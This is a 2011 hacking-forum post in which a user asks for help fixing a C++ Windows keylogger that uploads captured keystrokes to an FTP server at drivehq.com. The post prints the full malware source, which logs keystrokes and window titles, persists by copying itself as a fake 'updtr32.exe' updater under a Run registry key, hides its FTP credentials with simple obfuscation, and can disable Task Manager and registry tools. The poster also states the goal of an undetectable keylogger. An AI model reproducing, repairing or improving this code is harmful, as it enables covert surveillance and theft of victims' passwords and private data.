Author Topic: [C]Searching keylog sample with FTP upload. (Read 2006 times)

Stilius · « **on:** April 01, 2011, 08:41:40 PM »

Hi,
I am interesting in how hooked keystroke can be send to my ftp server. I have analized some samples. This is similar one:

Code: [Select]

#include <windows.h>
#include <wininet.h>
#include <fstream>
#include <ctime>

using namespace std;

std::string Keylog(int Key);

int StartUp();

DWORD WINAPI Upload(LPVOID);

int i,
key,
Size,
Sec;

ofstream Log;
ifstream Logger;

char Path[MAX_PATH+10],
RPath[300],
SysDir[MAX_PATH+10],
LogDir[MAX_PATH+10],
WindowText1[MAX_PATH+10],
WindowText2[MAX_PATH+10],
Time[10];

char *Buffer = 0,
*Server = 0,
*User = 0,
*Pass = 0,
*DTask = 0,
*DReg = 0,
*USec = 0,
*UVic = 0;

HKEY hKey;

HINTERNET hFtp,
hInet;

HWND Window;

DWORD dwValue = 1;

int main()
{
StartUp();

GetSystemDirectory(LogDir, sizeof(LogDir));
strcat(LogDir, "\\logg.txt");

Log.open(LogDir, ios:ut);

CreateThread(NULL, 0, Upload, 0, 0, NULL);

while(1)
{
Sleep(5);

_strtime(Time);

Window = GetForegroundWindow();

GetWindowText(Window, WindowText1, sizeof(WindowText1));

for(key = 8; key < 191; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
if(strcmp(WindowText1, WindowText2))
{
Log<<"Window Title: "<<WindowText1<<"\n";
Log<<Time<<": ";
strcpy(WindowText2, WindowText1);
}
Log<<Keylog(key);
}
}
}
}

std::string Keylog(int Key)
{
std::string KeyString;

if(Key==0x20)
KeyString = " ";

if(Key==0xBC)
KeyString = ",";

if(Key==0xBD)
KeyString = "-";

if(Key==0xBE)
KeyString = ".";

if(Key==0x08)
KeyString = "[BACKSPACE]";

if(Key==0x09)
KeyString = "[TAB]";

if(Key==0x0D)
KeyString = "[ENTER]";

if(Key==0x10)
KeyString = "[SHIFT]";

if(Key==0x11)
KeyString = "[STRG]";

if(Key==0x12)
KeyString = "[ALT]";

if(Key==0x14)
KeyString = "[CAPITAL]";

if(Key==0x30)
KeyString = "0";

if(Key==0x31)
KeyString = "1";

if(Key==0x32)
KeyString = "2";

if(Key==0x33)
KeyString = "3";

if(Key==0x34)
KeyString = "4";

if(Key==0x35)
KeyString = "5";

if(Key==0x36)
KeyString = "6";

if(Key==0x37)
KeyString = "7";

if(Key==0x38)
KeyString = "8";

if(Key==0x39)
KeyString = "9";

if(Key==0x41)
KeyString = "a";

if(Key==0x42)
KeyString = "b";

if(Key==0x43)
KeyString = "c";

if(Key==0x44)
KeyString = "d";

if(Key==0x45)
KeyString = "e";

if(Key==0x46)
KeyString = "f";

if(Key==0x47)
KeyString = "g";

if(Key==0x48)
KeyString = "h";

if(Key==0x49)
KeyString = "i";

if(Key==0x4A)
KeyString = "j";

if(Key==0x4B)
KeyString = "k";

if(Key==0x4C)
KeyString = "l";

if(Key==0x4D)
KeyString = "m";

if(Key==0x4E)
KeyString = "n";

if(Key==0x4F)
KeyString = "o";

if(Key==0x50)
KeyString = "p";

if(Key==0x51)
KeyString = "q";

if(Key==0x52)
KeyString = "r";

if(Key==0x53)
KeyString = "s";

if(Key==0x54)
KeyString = "t";

if(Key==0x55)
KeyString = "u";

if(Key==0x56)
KeyString = "v";

if(Key==0x57)
KeyString = "w";

if(Key==0x58)
KeyString = "x";

if(Key==0x59)
KeyString = "y";

if(Key==0x5A)
KeyString = "z";

if(Key==0x60)
KeyString = "0";

if(Key==0x61)
KeyString = "1";

if(Key==0x62)
KeyString = "2";

if(Key==0x63)
KeyString = "3";

if(Key==0x64)
KeyString = "4";

if(Key==0x65)
KeyString = "5";

if(Key==0x66)
KeyString = "6";

if(Key==0x67)
KeyString = "7";

if(Key==0x68)
KeyString = "8";

if(Key==0x69)
KeyString = "9";

return KeyString;
}

int StartUp()
{
GetModuleFileName(GetModuleHandle(NULL), Path, sizeof(Path));
GetSystemDirectory(SysDir, sizeof(SysDir));

strcat(SysDir, "\\update_3442897\\updtr32.exe");

if(strcmp(Path, SysDir))
{
GetSystemDirectory(SysDir, sizeof(SysDir));

strcat(SysDir, "\\update_3442897");

CreateDirectory(SysDir, 0);

strcat(SysDir, "\\updtr32.exe");

CopyFile(Path, SysDir, 0);

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "Updater", 0, REG_SZ, (const unsigned char*)SysDir, sizeof(SysDir));
RegCloseKey(hKey);
}

Logger.open(Path, ios::in | ios::binary);

Logger.seekg(0, ios::end);

Size = Logger.tellg();

Logger.seekg(0, ios::beg);

Buffer = (char*)malloc(Size);

Logger.read(Buffer, Size);

Logger.close();

// Getting infos

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '1' && Buffer[i+2] == '*')
{
Server = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '2' && Buffer[i+2] == '*')
{
User = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '3' && Buffer[i+2] == '*')
{
Pass = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '4' && Buffer[i+2] == '*')
{
DTask = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '5' && Buffer[i+2] == '*')
{
DReg = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '6' && Buffer[i+2] == '*')
{
USec = Buffer + i + 3;
break;
}
}

for(i = 0; i < Size; i++)
{
if(Buffer[i] == '*' && Buffer[i+1] == '7' && Buffer[i+2] == '*')
{
UVic = Buffer + i + 3;
break;
}
}

// Edit infos

if(Server != 0)
{
for(i = 0; i < strlen(Server); i++)
{
if(Server[i] == '*' && Server[i+1] == '2' && Server[i+2] == '*')
{
Server[i] = 0;
}
}

for(i = 0; i < strlen(Server); i++)
Server[i] = Server[i]-2;
}

if(User != 0)
{
for(i = 0; i < strlen(User); i++)
{
if(User[i] == '*' && User[i+1] == '3' && User[i+2] == '*')
{
User[i] = 0;
}
}

for(i = 0; i < strlen(User); i++)
User[i] = User[i]-2;
}

if(Pass != 0)
{
for(i = 0; i < strlen(Pass); i++)
{
if(Pass[i] == '*' && Pass[i+1] == '4' && Pass[i+2] == '*')
{
Pass[i] = 0;
}
}

for(i = 0; i < strlen(Pass); i++)
Pass[i] = Pass[i]-2;
}

if(DTask != 0)
{
for(i = 0; i < strlen(DTask); i++)
{
if(DTask[i] == '*' && DTask[i+1] == '5' && DTask[i+2] == '*')
{
DTask[i] = 0;
}
}

for(i = 0; i < strlen(DTask); i++)
DTask[i] = DTask[i]-2;
}

if(DReg != 0)
{
for(i = 0; i < strlen(DReg); i++)
{
if(DReg[i] == '*' && DReg[i+1] == '6' && DReg[i+2] == '*')
{
DReg[i] = 0;
}
}

for(i = 0; i < strlen(DReg); i++)
DReg[i] = DReg[i]-2;
}

if(USec != 0)
{
for(i = 0; i < strlen(USec); i++)
{
if(USec[i] == '*' && USec[i+1] == '7' && USec[i+2] == '*')
{
USec[i] = 0;
}
}

for(i = 0; i < strlen(USec); i++)
{
USec[i] = USec[i]-2;
}

Sec = atoi(USec);
}

if(UVic != 0)
{

for(i = 0; i < strlen(UVic); i++)
UVic[i] = UVic[i]-2;

strcat(UVic, " - Online.txt");
}

if(DTask != 0)
{
if(!strcmp(DTask, "yes"))
{
RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "DisableTaskMgr", 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
RegCloseKey(hKey);
}
}

if(DReg != 0)
{
if(!strcmp(DReg, "yes"))
{
RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "DisableRegistryTools", 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
RegCloseKey(hKey);
}
}
}*/

DWORD WINAPI Upload(LPVOID)
{
Sleep(Sec);

Log.close();

hInet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);

hFtp = InternetConnect(hInet, "drivehq.com", INTERNET_DEFAULT_FTP_PORT, "User", "Pass", INTERNET_SERVICE_FTP, 0, 0);

FtpPutFile(hFtp, LogDir, UVic, FTP_TRANSFER_TYPE_BINARY, 0);

InternetCloseHandle(hFtp);
InternetCloseHandle(hInet);

exit(0); //Log uploaded, exit now !
}

I have used -wininet linker in my Code:Blocks project. FTP server is drivehq.com

Code: [Select]

hFtp = InternetConnect(hInet, "drivehq.com", INTERNET_DEFAULT_FTP_PORT, "User", "Pass", INTERNET_SERVICE_FTP, 0, 0);

but I don't get keystroke. Any mind? Or maby someone can give better source code? I know that WinInet is not the best fot FUD keylogger, but I just learnin in. Happy ant with socks sample

thanks fellas

Author Topic: [C]Searching keylog sample with FTP upload. (Read 2006 times)

Stilius

[C]Searching keylog sample with FTP upload.